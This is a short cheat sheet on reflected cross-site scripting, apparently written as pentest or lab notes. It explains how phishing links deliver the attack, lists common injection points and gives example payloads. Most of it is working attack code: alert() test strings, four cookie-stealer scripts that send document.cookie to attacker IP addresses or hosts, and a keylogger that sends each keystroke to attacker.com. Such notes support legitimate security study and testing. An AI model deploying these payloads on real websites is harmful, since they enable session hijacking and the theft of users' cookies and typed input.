XSS Reflected
Reflected XSS
This starts by an attacker crafting a malicious email and then encouraging a user to click it. The malicious URL is often placed within a phishing email, but it could also be placed on a public website, such as a link within a comment. When the user clicks the malicious URL, it sends an HTTP request to a server with the user's cookie which the attacker can use to hijack the user/admin account through what's called session hijacking. To summarize, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
Entry points
Parameters in the URL Query String
URL File Path
Sometimes HTTP Headers
Search Fields
Comments section
Contact Forms
Example Payloads
JS
<script>alert("Hello")</script>
<script>alert(window.location.hostname)</script>
"><script>alert('XSS');</script>
[suitable for escaping input tags]
<textarea><script>alert('THM');</script>
[suitable for escaping text areas]
';alert('Hi_There');//'
Cookie Stealer
[1] JS
<script>fetch('http://10.8.133.250:8000/steal?cookie=' + btoa(document.cookie));</script>
[2] JS
<script>window.location='http://10.8.133.250:8000/cookie?'+document.cookie;</script>
[3] JS
<script>var myimg = new Image(); myimg.src = 'http://10.14.2.200/q?a=' + document.cookie;</script>
[4] JS
<script>document.location='http://ip:8000/XSS/grabber.php?c='+document.cookie;</script>
Keylogger
<script>document.onkeypress =
function(e) {
fetch('http://attacker.com/log?key=' + btoa(e.key));
}</script>
Last updated